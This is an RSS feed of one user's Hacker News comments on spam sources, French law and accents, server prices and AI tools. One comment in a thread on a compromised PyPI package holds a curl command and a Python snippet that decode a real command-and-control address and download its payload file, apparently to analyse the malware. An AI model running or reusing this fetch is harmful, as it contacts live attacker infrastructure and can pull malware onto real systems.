<rss version="2.0" xmlns:dc="http://purl.org/dc/elements/1.1/" xmlns:atom="http://www.w3.org/2005/Atom"><channel><title>Hacker News: _ache_</title><link>https://news.ycombinator.com/user?id=_ache_</link><description>Hacker News RSS</description><docs>https://hnrss.org/</docs><generator>hnrss v2.1.1</generator><lastBuildDate>Wed, 15 Apr 2026 04:50:57 +0000</lastBuildDate><atom:link href="https://hnrss.org/user?id=_ache_" rel="self" type="application/rss+xml"></atom:link><item><title><![CDATA[New comment by _ache_ in "C89cc.sh – standalone C89/ELF64 compiler in pure portable shell"]]></title><description><![CDATA[
<p>I'm tempted to execute it, but it may as well be shellcode I couldn't tell.</p>
]]></description><pubDate>Fri, 03 Apr 2026 03:23:13 +0000</pubDate><link>https://news.ycombinator.com/item?id=47622864</link><dc:creator>_ache_</dc:creator><comments>https://news.ycombinator.com/item?id=47622864</comments><guid isPermaLink="false">https://news.ycombinator.com/item?id=47622864</guid></item><item><title><![CDATA[New comment by _ache_ in "Email obfuscation: What works in 2026?"]]></title><description><![CDATA[
<p>I'm not denying that it happens.
I'm saying that it not the classical way to spam people nowadays.<p>It's obvious to any non native english speaker, when you have a spam in english, it is because they toke the email from the web. When it's in you native language, it's usually  from a data breach.<p>I'm vastly more spammed by the later. I can confirm it with unique email addresses of the "+" form (but not with the + character).<p>Also when I'm spammed in english, it's for Web3 crypto stuff and from a data breach it's a phishing attempt.</p>
]]></description><pubDate>Thu, 02 Apr 2026 11:22:36 +0000</pubDate><link>https://news.ycombinator.com/item?id=47612920</link><dc:creator>_ache_</dc:creator><comments>https://news.ycombinator.com/item?id=47612920</comments><guid isPermaLink="false">https://news.ycombinator.com/item?id=47612920</guid></item><item><title><![CDATA[New comment by _ache_ in "Email obfuscation: What works in 2026?"]]></title><description><![CDATA[
<p>I'm sorry, but that is not how email address are spammed in bulk.<p>The data-source are the enormous data breach that are more and more frequent.
There is more intensive to collect more information on someone you already know something about than spamming an email you don't even know if it's a valid one.<p>The spam can also be very more effective as it present itself with personal information about the spammed.</p>
]]></description><pubDate>Thu, 02 Apr 2026 06:06:01 +0000</pubDate><link>https://news.ycombinator.com/item?id=47610524</link><dc:creator>_ache_</dc:creator><comments>https://news.ycombinator.com/item?id=47610524</comments><guid isPermaLink="false">https://news.ycombinator.com/item?id=47610524</guid></item><item><title><![CDATA[New comment by _ache_ in "OpenYak – An open-source Cowork that runs any model and owns your filesystem"]]></title><description><![CDATA[
<p>Absolutely, that is misleading to not-much-technical people, maybe intentionally.  
Does not inspire confidence.</p>
]]></description><pubDate>Sun, 29 Mar 2026 09:10:26 +0000</pubDate><link>https://news.ycombinator.com/item?id=47561540</link><dc:creator>_ache_</dc:creator><comments>https://news.ycombinator.com/item?id=47561540</comments><guid isPermaLink="false">https://news.ycombinator.com/item?id=47561540</guid></item><item><title><![CDATA[New comment by _ache_ in "OpenYak – An open-source Cowork that runs any model and owns your filesystem"]]></title><description><![CDATA[
<p>> Yes. OpenYak is local-first. Your conversations and files are stored only on your machine. When using cloud models, only API calls to LLM providers leave your computer.<p>So local-first and still upload files to cloud models if you configure it.</p>
]]></description><pubDate>Sun, 29 Mar 2026 05:32:53 +0000</pubDate><link>https://news.ycombinator.com/item?id=47560638</link><dc:creator>_ache_</dc:creator><comments>https://news.ycombinator.com/item?id=47560638</comments><guid isPermaLink="false">https://news.ycombinator.com/item?id=47560638</guid></item><item><title><![CDATA[New comment by _ache_ in "Spanish legislation as a Git repo"]]></title><description><![CDATA[
<p>In France, not only our law are versioned.  
It's formally proved too!<p><a href="https://catala-lang.org/" rel="nofollow">https://catala-lang.org/</a><p>*Edit*: Woah ! The French crew is here. We are at least 5 quoting a variation of <<a href="https://www.legifrance.gouv.fr/" rel="nofollow">https://www.legifrance.gouv.fr/</a>> for versioning.</p>
]]></description><pubDate>Sat, 28 Mar 2026 14:39:45 +0000</pubDate><link>https://news.ycombinator.com/item?id=47555022</link><dc:creator>_ache_</dc:creator><comments>https://news.ycombinator.com/item?id=47555022</comments><guid isPermaLink="false">https://news.ycombinator.com/item?id=47555022</guid></item><item><title><![CDATA[New comment by _ache_ in "Telnyx package compromised on PyPI"]]></title><description><![CDATA[
<p>How can we get the wav ? `curl -A "Mozilla/5.0" "http://<C2C_EndPoint>/hangup.wav"` does hang.<p>No ... I tried hard.
But still get a timeout.<p><pre><code>    import urllib.request
    import base64

    def _d(x):
        return base64.b64decode(x).decode("utf-8")


    C2C_URL = _d("aHR0cDovLzgzLjE0Mi4yMDkuMjAzOjgwODAvaGFuZ3VwLndhdg==")
    # C2C_URL = "http://XXXXX:8080/ringtone.wav"

    r = urllib.request.Request(
        C2C_URL, headers={_d("VXNlci1BZ2VudA=="): _d("TW96aWxsYS81LjA=")}
    )
    with urllib.request.urlopen(r, timeout=15) as d:
        with open("/tmp/exatracted_tpcp.wav", "wb") as f:
            f.write(d.read())</code></pre></p>
]]></description><pubDate>Fri, 27 Mar 2026 23:47:45 +0000</pubDate><link>https://news.ycombinator.com/item?id=47549887</link><dc:creator>_ache_</dc:creator><comments>https://news.ycombinator.com/item?id=47549887</comments><guid isPermaLink="false">https://news.ycombinator.com/item?id=47549887</guid></item><item><title><![CDATA[New comment by _ache_ in "Explore the Hidden World of Sand"]]></title><description><![CDATA[
<p>I come from a island where its common to pain with sand. About one hundred beach, around two hundred colors, green is hard to make.<p>I learned that local sand composition is very affected by local geology.</p>
]]></description><pubDate>Fri, 27 Mar 2026 18:33:04 +0000</pubDate><link>https://news.ycombinator.com/item?id=47546515</link><dc:creator>_ache_</dc:creator><comments>https://news.ycombinator.com/item?id=47546515</comments><guid isPermaLink="false">https://news.ycombinator.com/item?id=47546515</guid></item><item><title><![CDATA[New comment by _ache_ in "French e, è, é, ê, ë – what's the difference?"]]></title><description><![CDATA[
<p>And ê, when pronounced (most of the cases) it's just a è.<p>ë, contrary as said in the article (full slop?) is the most complicated and with some exceptions. But there is so few words that use that letter that you just don't have to care.<p>Just pronounce ë as è when its in (inside) a word and not pronounced at all when it's at the end.
The only exception I can think of is canoë (pronounced conoé), but everybody will understand if you say cano.</p>
]]></description><pubDate>Thu, 26 Mar 2026 17:32:21 +0000</pubDate><link>https://news.ycombinator.com/item?id=47533311</link><dc:creator>_ache_</dc:creator><comments>https://news.ycombinator.com/item?id=47533311</comments><guid isPermaLink="false">https://news.ycombinator.com/item?id=47533311</guid></item><item><title><![CDATA[New comment by _ache_ in "Arm AGI CPU"]]></title><description><![CDATA[
<p>They did ask AI if AGI what a great name.
It said that it was the greatest name possible. It's bold, aspirational, and ... polarizing?!<p>Oh god! Mistral tell me it's highly polarizing, will make the buzz and it's risky but anyway people will know that ARM is doing CPU again now (maybe I did put too many context).</p>
]]></description><pubDate>Tue, 24 Mar 2026 19:14:09 +0000</pubDate><link>https://news.ycombinator.com/item?id=47507648</link><dc:creator>_ache_</dc:creator><comments>https://news.ycombinator.com/item?id=47507648</comments><guid isPermaLink="false">https://news.ycombinator.com/item?id=47507648</guid></item><item><title><![CDATA[New comment by _ache_ in "Books of the Century by Le Monde"]]></title><description><![CDATA[
<p>About IP. It's 70 years after the death of the author in France, so Camus (car crash in 1960) books will be PD in 2030.  
There is an exception for people who lost live from war (+30 years), so 2044 is the year the elevate to PD for "Le petit prince".<p>I don't understand that right is attached to local legislation. Like you will have access to these book before we do because of the local legislation of USA? That is a bit crazy.</p>
]]></description><pubDate>Sat, 21 Mar 2026 22:48:39 +0000</pubDate><link>https://news.ycombinator.com/item?id=47472326</link><dc:creator>_ache_</dc:creator><comments>https://news.ycombinator.com/item?id=47472326</comments><guid isPermaLink="false">https://news.ycombinator.com/item?id=47472326</guid></item><item><title><![CDATA[New comment by _ache_ in "OpenCode – Open source AI coding agent"]]></title><description><![CDATA[
<p>I was going to say that pnpm isn't that old but wikipedia says 2017!</p>
]]></description><pubDate>Sat, 21 Mar 2026 13:49:51 +0000</pubDate><link>https://news.ycombinator.com/item?id=47467016</link><dc:creator>_ache_</dc:creator><comments>https://news.ycombinator.com/item?id=47467016</comments><guid isPermaLink="false">https://news.ycombinator.com/item?id=47467016</guid></item><item><title><![CDATA[New comment by _ache_ in "OpenCode – Open source AI coding agent"]]></title><description><![CDATA[
<p>If you evaluate fascism in terms of donation, yes.<p>But it is more about the political opinions, IMHO, and Anthropic doesn't sound more attractive than the competitors. Anthropic is very much to the right of the transhumanism spectrum (even if xAI and OpenAI are even farther).</p>
]]></description><pubDate>Sat, 21 Mar 2026 13:07:27 +0000</pubDate><link>https://news.ycombinator.com/item?id=47466672</link><dc:creator>_ache_</dc:creator><comments>https://news.ycombinator.com/item?id=47466672</comments><guid isPermaLink="false">https://news.ycombinator.com/item?id=47466672</guid></item><item><title><![CDATA[New comment by _ache_ in "Atuin v18.13 – better search, a PTY proxy, and AI for your shell"]]></title><description><![CDATA[
<p>There is no way is it not generated on user computer.<p>"get the correct command first" and "shipping a [external] dataset" are incompatible.</p>
]]></description><pubDate>Sat, 21 Mar 2026 12:06:12 +0000</pubDate><link>https://news.ycombinator.com/item?id=47466295</link><dc:creator>_ache_</dc:creator><comments>https://news.ycombinator.com/item?id=47466295</comments><guid isPermaLink="false">https://news.ycombinator.com/item?id=47466295</guid></item><item><title><![CDATA[New comment by _ache_ in "OpenCode – Open source AI coding agent"]]></title><description><![CDATA[
<p>Yes, you are doing it too with antropic an xAI. I don't get your point. xAI and OpenAI are a little worst? Maybe, still very well fascism.</p>
]]></description><pubDate>Sat, 21 Mar 2026 04:15:53 +0000</pubDate><link>https://news.ycombinator.com/item?id=47463920</link><dc:creator>_ache_</dc:creator><comments>https://news.ycombinator.com/item?id=47463920</comments><guid isPermaLink="false">https://news.ycombinator.com/item?id=47463920</guid></item><item><title><![CDATA[New comment by _ache_ in "Anthropic takes legal action against OpenCode"]]></title><description><![CDATA[
<p>AI company crying over IP violation. Incredible.</p>
]]></description><pubDate>Thu, 19 Mar 2026 20:51:27 +0000</pubDate><link>https://news.ycombinator.com/item?id=47445895</link><dc:creator>_ache_</dc:creator><comments>https://news.ycombinator.com/item?id=47445895</comments><guid isPermaLink="false">https://news.ycombinator.com/item?id=47445895</guid></item><item><title><![CDATA[New comment by _ache_ in "Mathematics Distillation Challenge – Equational Theories"]]></title><description><![CDATA[
<p>As I say, I understand the goal of having a <i>cheat sheet</i> that can distills a big chunk of math. But that distillation would have been better done by a neural network instead of the creation of a prompt (fine-tuning or pure distillation). But studying that neural network will be harder.<p>It's explicitly stated that the goal is to improve performance of cheap models but I assume, like you did, that they are hopping that the plain text may be useful to humans too.</p>
]]></description><pubDate>Sun, 15 Mar 2026 14:25:45 +0000</pubDate><link>https://news.ycombinator.com/item?id=47387678</link><dc:creator>_ache_</dc:creator><comments>https://news.ycombinator.com/item?id=47387678</comments><guid isPermaLink="false">https://news.ycombinator.com/item?id=47387678</guid></item><item><title><![CDATA[New comment by _ache_ in "Qatar helium shutdown puts chip supply chain on a two-week clock"]]></title><description><![CDATA[
<p>Well, I only tried ~~one~~ two servers:<p>T560:<p>Priced £3,505 in may 2025: <a href="https://web.archive.org/web/20250702124754/https://www.dell.com/en-uk/shop/dell-servers-storage-networking/dell-poweredge-t560-tower-server/spd/poweredge-t560/emea_pet5604a" rel="nofollow">https://web.archive.org/web/20250702124754/https://www.dell....</a><p>Now at £13,979: <a href="https://www.dell.com/en-uk/shop/dell-servers-storage-networking/dell-poweredge-t560-tower-server/spd/poweredge-t560/emea_pet5604a" rel="nofollow">https://www.dell.com/en-uk/shop/dell-servers-storage-network...</a><p>It's a 10k£ increase or about x3.<p>I also just tried with R360, x2 in price only, from $4,959 dec 2025 to $17,142 today.<p>dec 2025: <a href="https://web.archive.org/web/20251210154822/https://www.dell.com/en-us/shop/servers-storage-and-networking/poweredge-r360-rack-server/spd/poweredge-r360/pe_r360_15330_os_vi_vp" rel="nofollow">https://web.archive.org/web/20251210154822/https://www.dell....</a><p>Today:  <a href="https://www.dell.com/en-us/shop/servers-storage-and-networking/poweredge-r360-rack-server/spd/poweredge-r360/pe_r360_15330_os_vi_vp" rel="nofollow">https://www.dell.com/en-us/shop/servers-storage-and-networki...</a><p>Edit: Add another one with US dollar.</p>
]]></description><pubDate>Sun, 15 Mar 2026 04:05:35 +0000</pubDate><link>https://news.ycombinator.com/item?id=47384248</link><dc:creator>_ache_</dc:creator><comments>https://news.ycombinator.com/item?id=47384248</comments><guid isPermaLink="false">https://news.ycombinator.com/item?id=47384248</guid></item><item><title><![CDATA[New comment by _ache_ in "Mathematics Distillation Challenge – Equational Theories"]]></title><description><![CDATA[
<p>Already saw it on Mastodon yesterday. A better presentation is in the other link. (<a href="https://competition.sair.foundation/competitions/mathematics-distillation-challenge-equational-theories-stage1/overview" rel="nofollow">https://competition.sair.foundation/competitions/mathematics...</a>)<p>I understand the idea of a distillation challenge but it really feels like the poor man's solution to a problem that could be better solved by training a LLM and analysing the layers.  
In the end, as I value a condensed "cheat sheet", if the goal is to improve open-source model. A better approach seems to recreate the AlphaProof system, longer to do, but more efficient. The path taken by mathematicians now is agentic system with general LLM.<p>- Masto: <a href="https://mathstodon.xyz/@tao/116225525978210807" rel="nofollow">https://mathstodon.xyz/@tao/116225525978210807</a><p>- AlphaProof: <a href="https://deepmind.google/blog/ai-solves-imo-problems-at-silver-medal-level/" rel="nofollow">https://deepmind.google/blog/ai-solves-imo-problems-at-silve...</a><p>- AlphaProof description: <a href="https://www.nature.com/articles/s41586-025-09833-y" rel="nofollow">https://www.nature.com/articles/s41586-025-09833-y</a></p>
]]></description><pubDate>Sun, 15 Mar 2026 03:44:51 +0000</pubDate><link>https://news.ycombinator.com/item?id=47384120</link><dc:creator>_ache_</dc:creator><comments>https://news.ycombinator.com/item?id=47384120</comments><guid isPermaLink="false">https://news.ycombinator.com/item?id=47384120</guid></item><item><title><![CDATA[New comment by _ache_ in "Qatar helium shutdown puts chip supply chain on a two-week clock"]]></title><description><![CDATA[
<p>They are toxic.</p>
]]></description><pubDate>Sat, 14 Mar 2026 13:16:49 +0000</pubDate><link>https://news.ycombinator.com/item?id=47376388</link><dc:creator>_ache_</dc:creator><comments>https://news.ycombinator.com/item?id=47376388</comments><guid isPermaLink="false">https://news.ycombinator.com/item?id=47376388</guid></item></channel></rss>